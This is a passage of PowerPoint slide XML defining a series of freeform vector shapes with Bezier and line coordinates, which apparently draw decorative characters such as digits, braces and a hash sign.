                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="77" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="71" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="41"/>
                      <a:pt x="71" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="39"/>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301"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="789"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 1 h 2"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1 h 2"/>
                  <a:gd name="T8" fmla="*/ 2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cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2"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Freeform 302"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="789"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 3 w 3"/>
                  <a:gd name="T5" fmla="*/ 1 h 1"/>
                  <a:gd name="T6" fmla="*/ 2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2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="2" y="1"/>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Freeform 303"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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7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7"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Freeform 304"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="1468"/>
                <a:ext cx="82"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Freeform 306"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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307"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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Freeform 308"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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309"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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5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1" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="35"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Freeform 310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="1468"/>
                <a:ext cx="83"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311"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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8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8"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Freeform 312"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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2" y="185"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="158"/>
                      <a:pt x="4" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="11" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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313"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="1473"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 219"/>
                  <a:gd name="T8" fmla="*/ 177 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 127 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 50 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 43 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 2 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 219"/>
                  <a:gd name="T48" fmla="*/ 123 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 219"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 219"/>
                  <a:gd name="T64" fmla="*/ 110 w 189"/>
                  <a:gd name="T65" fmla="*/ 134 h 219"/>
                  <a:gd name="T66" fmla="*/ 121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4" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>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Freeform 314"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 241"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="27"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="104"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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315"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="1473"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 241"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 241"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 241"/>
                  <a:gd name="T30" fmla="*/ 42 w 63"/>
                  <a:gd name="T31" fmla="*/ 83 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 112 h 241"/>
                  <a:gd name="T34" fmla="*/ 63 w 63"/>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0" y="212"/>
                      <a:pt x="22" y="205"/>
                      <a:pt x="22" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="155"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="22" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="136"/>
                      <a:pt x="29" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42"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Freeform 316"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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317"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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6" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="158"/>
                      <a:pt x="4" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="5"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Freeform 318"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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319"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982" y="1469"/>
                <a:ext cx="156" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 100 h 202"/>
                  <a:gd name="T2" fmla="*/ 123 w 128"/>
                  <a:gd name="T3" fmla="*/ 144 h 202"/>
                  <a:gd name="T4" fmla="*/ 110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0" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="184"/>
                      <a:pt x="98" y="191"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="21" y="185"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="158"/>
                      <a:pt x="4" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="1" y="73"/>
                      <a:pt x="4" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="11" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="18"/>
                      <a:pt x="29" y="11"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="128" y="33"/>
                      <a:pt x="128" y="100"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="102"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="46"/>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Freeform 320"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="1468"/>
                <a:ext cx="82" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 45 w 68"/>
                  <a:gd name="T3" fmla="*/ 200 h 200"/>
                  <a:gd name="T4" fmla="*/ 45 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 200"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 36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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31" y="41"/>
                      <a:pt x="27" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="45"/>
                      <a:pt x="18" y="47"/>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321"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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Freeform 322"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477" y="1469"/>
                <a:ext cx="156" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 100 h 202"/>
                  <a:gd name="T2" fmla="*/ 123 w 128"/>
                  <a:gd name="T3" fmla="*/ 144 h 202"/>
                  <a:gd name="T4" fmla="*/ 111 w 128"/>
